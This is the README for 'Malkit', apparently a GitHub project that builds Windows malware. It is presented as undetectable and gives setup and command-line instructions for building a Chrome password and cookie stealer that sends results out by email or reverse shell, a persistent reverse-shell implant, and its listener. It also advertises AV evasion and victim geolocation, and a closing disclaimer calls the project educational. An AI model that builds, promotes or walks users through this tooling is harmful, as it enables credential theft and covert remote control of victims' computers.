Malkit is a python-based console application that generates runtime-decrypted undetectable windows executables. It has the following features:
- Copying itself into startup as a legitimate application
- Connecting back to an attacker via reverse shell
- Custom listener with upload, download and modular capability (in progress)
- Chromepass feature:
- Decrypt Chrome saved paswords ad well as all cookies
- Send a file with the login/password combinations remotely (email or reverse shell)
- Send a file with all the extracted cookies as well as another file with possible email-related cookies
- Custom icon
- Custom error message
- Accurate location reporting. It can detect and send back a victim's accurate geolocation (not ip-based) (X)
- Easy to use
- Completely undetectable by AV engines
Features marked with an X are still in development and aren't fully working but are already complete in internal testing.
Due to the way this has been coded, it is currently fully undetected. Here are some links to scans performed
- From build_malware
- From build_chromepass
- Both scans yielded the result: 1/69 detections. The sole detection is a false positive by Sangfor Engine Zero. I tried submitting a simple hello world program for analysis and the same AV detected it as malware as well.
- This is an educational project first and foremost, so distribution (or the lack thereof) is not a concern, hence the usage of VirusTotal
For this application you need:
- Python - Only tested on 3.7.5 on Anaconda environment but should work in 3.6+ (Doesn't work in 3.8 yet). No need to download it from here, just follow Installation below
VS build tools - This is required to build some requirements. Please download it, install it and restart your computer BEFORE proceding to InstallationNo longer needed due to last update. However, should you not be able to install therequirements.txt
, open the file and downgradepexe37
to0.9.6.4
anddarkarp
to3.4
(ONLY if you get errors when installing therequirements.txt
. For now, just go to Installation )
Chromepass requires Python 3.6+ to run. It has been tested on a full anaconda installation but it doesn't necessariliy require it. It doesn't work with Python 3.8 yet The instructions on the full setup are below.
Setup Anaconda environment:
- Visit Anaconda and download the graphical installer for windows.
- Run the installer and make sure you select the checkbox "Add conda to path", even though it isn't recommended.
- Open up a new powershell window as administrator and run:
Set-ExecutionPolicy RemoteSigned
- Press
A
when it prompts you. - Close this window
- Open up a normal powershell and enable conda to use it:
conda init powershell
- Close and open a new powershell and update conda:
conda update conda
- Create a new anaconda environment:
conda create -n malkit python=3.7
- Activate your environment:
conda activate malkit
- Note: Every time you open a new powershell and want to run malkit you need to activate your environment.
Clone the Repository and access its directory:
> git clone https://github.com/darkarp/malkit.git
> cd malkit
Install the dependencies:
> pip install -r requirements.txt
If any errors occur make sure you're running on the proper environment (if applcable) and that you have python 3.6+ < 3.8 (preferably 3.7.5). If the errors persist, try:
> python -m pip install --upgrade pip
> python -m pip install -r requirements.txt
If any errors still persist, make sure you have the following installed:
- Show the help screen
python malkit.py -h
usage: python malkit.py [-h] {build_listener, build_malware, build_chromepass} ...
positional arguments:
{build_listener, build_malware, build_chromepass}
optional arguments:
-h, --help show this help message and exit
- Access the help menu for individual arguments
python malkit.py build_chromepass -h
usage: python malkit.py build_chromepass [-h] [--load] [--email] [--reverse_shell]
[--no_error]
[--errormsg Error message to appear]
[--address Email address to send details to, if Email was chosen]
[--port Port for reverse connection, if Reverse shell was chosen.]
[--host Host reverse connection, if Reverse shell was chosen.]
optional arguments:
-h, --help show this help message and exit
--load
--email
--reverse_shell
--no_error
--errormsg Error message to appear
--address Email address to send details to, if Email was chosen
--port Port for reverse connection, if Reverse shell was chosen.
--host Host reverse connection, if Reverse shell was chosen.
example:
python malkit.py build_chromepass --email --address myemail@gmail.com
python malkit.py build_chromepass --reverse_shell --host 127.0.0.1 -p 4444
python malkit.py build_chromepass --load myfile.conf
-
Building an executable that grabs and sends chrome-saved passwords through email
python malkit.py build_chromepass --email --address youremailaddress@yourdomain.com
-
Creating a persistent reverse_shell with additional features
python malkit.py build_malware --host 127.0.0.1 -p 444
- Replace the host with your external/internal ip as needed
- Replace the port as needed
- Make sure you build the listener as well and run it.
-
Creating a listener for the malware
python malkit.py build_listener -p 444
- This is the listener for the malware
- While in the shell, you can use the
list
command to see active sessions. - You can interact with a session by using the command:
interact::SESSION_NUMBER
whereSESSION_NUMBER
is the number of the session you want to connect with. - To go back into listener mode after interacting with a session, use the command
<bg
or<background
- Other commands while interacting have been added but still experimental:
<download
- Downloads a file from the server
- Reducing
malware
file size to around 4-6 MB, possible by making the originalmalware
download the rest of the payload via the reverse connection. - Sending Real-time precise location of the victim (completed, releases next update)
- Also steal Firefox passwords (Completed, releases next update)
- Also steal passwords from other programs, such as keychains(in progress)
- Better encryption (Completed, releases into beta version)
If you find an error or a bug, please report it as an issue. If you wish to suggest a feature or an improvement please report it in the issue pages.
Please follow the templates shown when creating the issue.
For access to a community full of aspiring computer security experts, ranging from the complete beginner to the seasoned veteran, join our Discord Server: WhiteHat Hacking
If you wish to contact me, you can do so via: marionascimento@itsec.bz
I am not responsible for what you do with the information and code provided. This is intended for professional or educational purposes only.